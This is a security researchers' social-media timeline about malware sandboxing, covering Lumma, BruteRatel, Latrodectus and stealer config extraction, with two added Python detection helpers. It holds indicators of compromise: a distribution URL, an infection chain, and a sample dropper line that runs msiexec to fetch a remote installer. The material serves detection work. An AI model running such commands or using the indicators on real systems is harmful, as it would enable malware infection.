
CAPE Sandbox (@CapeSandbox)
Bio: Payloads or it didn't happen. https://t.co/rAVsWT6dcl
Joined April 2017
Followers 4K · Following 200 · Media 244 · Statuses 779
#Amatera payload extraction & direct syscall capture.
New Octowave Loader sample > Amatera Stealer. 0 VT. Proofpoint rules detect the traffic. My Yara rule detects the installer. Adobe printer driver sideloads tbb.dll, tbb.dll loads app-2.3.dll which gets stego from blood.wav, uses zxing.presentation.dll.
RT @abuse_ch: We're proud to announce our support for @CapeSandbox , a fully open-source malware sandbox developed and maintained by a dedi….
RT @marsomx_: [1/n] In the hope that it might be useful to someone, I am happy to share with the community my basic (and cheap) implementat….
#Lumma config & payload extraction
It is really interesting to find anti-VM techniques being used by threat actors in the wild. This is a PowerShell script protecting a #Lumma Stealer build and being spread on YouTube videos. In this case, this was enough to make @anyrun_app fail based on Screen Resolution
More #BruteRatel.
#BruteRatel #Latrodectus A New JS Nasty Obfuscation #TTPs & #IOCs - Multi-Line Comments🚨. [+] JS T1059.007. [+] Msiexec T1218.007. TA abuses multi-line (/* , */) comments to hide malcode and bypass detections - VT detections 20/62. Distro MSI IP: tp://95.164.17[.]212/BEST[.]msi
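The post above describes a JavaScript dropper whose real code is buried inside oversized `/* ... */` block comments. The helper below is an added triage example (my own code, not CAPE's, Proofpoint's or the poster's): it strips block comments while leaving string literals alone, reports what fraction of the file the comments hide, and flags the file when that fraction is high and the surviving code calls a scripting-host API. The sample script is constructed to imitate the layout; it is not the real Document-21-29-08.js, and the `example.invalid` URL, the 0.8 threshold and the API keyword list are assumptions.

```python
"""Added triage helper (not CAPE code): strip /* ... */ block comments from a
JavaScript dropper and measure how much of the file they hide.

Limitations: '//' line comments and regex literals are not parsed, so a quote
character inside either of those will be treated as opening a string.
"""


def strip_block_comments(src: str) -> tuple[str, int]:
    """Return (code_without_block_comments, characters_removed).

    Walks the source one character at a time so that '/*' inside a string
    literal is kept, and a comment ends only at the first '*/' after it.
    """
    out: list[str] = []
    removed = 0
    i, n = 0, len(src)
    in_str = None  # quote character of the string we are inside, or None
    while i < n:
        ch = src[i]
        if in_str:
            out.append(ch)
            if ch == "\\" and i + 1 < n:  # keep the escaped character verbatim
                out.append(src[i + 1])
                i += 2
                continue
            if ch == in_str:
                in_str = None
            i += 1
            continue
        if ch in ("'", '"', "`"):
            in_str = ch
            out.append(ch)
            i += 1
            continue
        if src.startswith("/*", i):
            end = src.find("*/", i + 2)
            if end == -1:  # unterminated comment swallows the rest of the file
                removed += n - i
                break
            removed += end + 2 - i
            i = end + 2
            continue
        out.append(ch)
        i += 1
    return "".join(out), removed


# Assumed keyword list: APIs a JS dropper needs to spawn msiexec or similar.
SUSPICIOUS_APIS = ("ActiveXObject", "WScript.Shell", "msiexec", "Run(")


def triage(src: str, threshold: float = 0.8) -> dict:
    """Flag files that are mostly block comment and still reach a shell API."""
    code, removed = strip_block_comments(src)
    ratio = removed / len(src) if src else 0.0
    live = [ln for ln in code.splitlines() if ln.strip()]
    return {
        "comment_ratio": round(ratio, 3),
        "live_lines": live,
        "suspicious": ratio >= threshold and any(api in code for api in SUSPICIOUS_APIS),
    }


# Constructed sample imitating the TTP: three live lines hidden between filler comments.
FILLER = "lorem ipsum dolor sit amet "
SAMPLE_JS = "\n".join([
    "/* " + FILLER * 40 + " */",
    'var s = new ActiveXObject("WScript.Shell"); /* junk /* still junk */',
    "/* " + FILLER * 20 + " */",
    'var c = "/* not a comment */";',
    's.Run("msiexec /i http://example.invalid/BEST.msi /q", 0);',
    "/* " + FILLER * 20 + " */",
]) + "\n"

if __name__ == "__main__":
    result = triage(SAMPLE_JS)
    print(f"comment ratio: {result['comment_ratio']}  suspicious: {result['suspicious']}")
    for line in result["live_lines"]:
        print("  ", line)
```

Run it against a real dropper by replacing `SAMPLE_JS` with the file contents; the live lines it prints are what you would hand to a deobfuscator next, and the ratio is a cheap signal to pair with the YARA or network rules the post mentions rather than a replacement for them.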
#BruteRatel config & payload extraction, syscall capture #BRC4
#Latrodectus - #BruteRatel - .pdf > url > .js > .msi > .dll. 18.09.2024 👇. wscript.exe Document-21-29-08.js. msiexec.exe /V. MSI152A.tmp /DontWait. rundll32.exe C:\Users\Admin\AppData\Roaming\x64_stealth.dll, clBuildProgram. (1/3) 👇. IOCs.
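The execution chain in the post above (wscript.exe running the .js, msiexec.exe in service mode, the MSI*.tmp helper, then rundll32.exe loading a DLL from AppData\Roaming by export name) is the kind of sequence that is easy to describe and awkward to detect by parent/child alone, because the msiexec service hop breaks the process tree. The code below is an added detection example (my own, not CAPE's or the poster's) that classifies process-creation events into the stages named in the post and alerts when a scripting-host stage is followed on the same host by a rundll32 export load from a user directory. The file names come from the post; the host names, timestamps, System32 paths and the 15-minute window are constructed, and T1218.011 (the ATT&CK id for Rundll32) is added here, not taken from the post.

```python
"""Added detection example (not CAPE code): correlate the
wscript.exe -> msiexec.exe -> MSI*.tmp -> rundll32.exe chain across
process-creation events without relying on a clean parent/child tree.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    host: str
    ts: datetime
    image: str    # full path of the created process
    cmdline: str


# Assumed patterns. T1059.007 and T1218.007 are the ids given in the post;
# T1218.011 (Rundll32) is added here.
USER_DIR = re.compile(r"\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop)\\", re.I)
RUNDLL_EXPORT = re.compile(
    r'rundll32(?:\.exe)?\s+"?(?P<dll>[^",]+?\.dll)"?\s*,\s*(?P<export>[\w@#]+)', re.I)
MSI_TMP = re.compile(r"\\MSI[0-9A-F]{3,4}\.tmp$", re.I)


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(e: ProcEvent):
    """Return (stage, technique, detail) when the event matches a chain stage, else None."""
    img = _base(e.image)
    if img in ("wscript.exe", "cscript.exe") and re.search(r"\.jse?\b", e.cmdline, re.I):
        return ("js_host", "T1059.007", e.cmdline)
    # /V is the service-side switch from the post; /i <url> is the usual client side.
    if img == "msiexec.exe" and re.search(r'(?:^|\s)/(?:V\b|i\s+"?https?:)', e.cmdline, re.I):
        return ("msiexec", "T1218.007", e.cmdline)
    if MSI_TMP.search(e.image) and "/dontwait" in e.cmdline.lower():
        return ("msi_tmp", "T1218.007", e.image)
    if img == "rundll32.exe":
        m = RUNDLL_EXPORT.search(e.cmdline)
        if m and USER_DIR.search(m.group("dll")):
            return ("rundll_export", "T1218.011", f'{m.group("dll")},{m.group("export")}')
    return None


def correlate(events, window=timedelta(minutes=15)):
    """Alert when a host shows a js_host stage and, within `window`, a rundll32
    export load from a user directory. msiexec stages are recorded when seen
    but not required, since the service hop hides them from tree-based rules."""
    alerts, seen = [], {}
    for e in sorted(events, key=lambda x: x.ts):
        hit = classify(e)
        if hit is None:
            continue
        stage, technique, detail = hit
        recent = [h for h in seen.get(e.host, []) if e.ts - h[0] <= window]
        recent.append((e.ts, stage, technique, detail))
        seen[e.host] = recent
        if stage == "rundll_export" and any(h[1] == "js_host" for h in recent):
            alerts.append({
                "host": e.host,
                "stages": [h[1] for h in recent],
                "techniques": sorted({h[2] for h in recent}),
                "export": detail.split(",")[-1],
            })
    return alerts


# Constructed events: the chain from the post on ws01, plus a benign rundll32 on ws02.
T0 = datetime(2024, 9, 18, 10, 0, 0)
SAMPLE_EVENTS = [
    ProcEvent("ws01", T0, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\Admin\Downloads\Document-21-29-08.js"'),
    ProcEvent("ws01", T0 + timedelta(seconds=5), r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /V"),
    ProcEvent("ws01", T0 + timedelta(seconds=9), r"C:\Windows\Installer\MSI152A.tmp",
              r"C:\Windows\Installer\MSI152A.tmp /DontWait"),
    ProcEvent("ws01", T0 + timedelta(seconds=12), r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\Admin\AppData\Roaming\x64_stealth.dll, clBuildProgram"),
    ProcEvent("ws02", T0, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a)
```

The export-name check is what separates this from a generic rundll32 rule: legitimate rundll32 invocations of user-directory DLLs are rare enough that the combination with a preceding script host is worth an alert on its own, and the extra msiexec stages raise confidence when the telemetry captures them.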
RT @InvokeReversing: We've uploaded our lecture on Automating Malware Triage from our Introduction to Malware Binary Triage course. Huge sh….
RT @ka1do9: Lightweight blog alert!. This post goes over fast Bumblebee unpacking and configuration extraction. I've come across posts wher….
1/ You might have noticed that my area of interest is specifically stealers and RATs 😅. Wrote the configuration extractor for #Vidar stealer
Proud to have my old #RedLine #Stealer config extractor featured in @CapeSandbox. A pleasure to collaborate :). Actually a deserved shoutout again to @huettenhain who taught me how to do it using byte-patterns ❤️.
#Nighthawk config extraction by @ka1do9 🙏.
First open-source contribution! #Nighthawk DLL configuration parser in @CapeSandbox :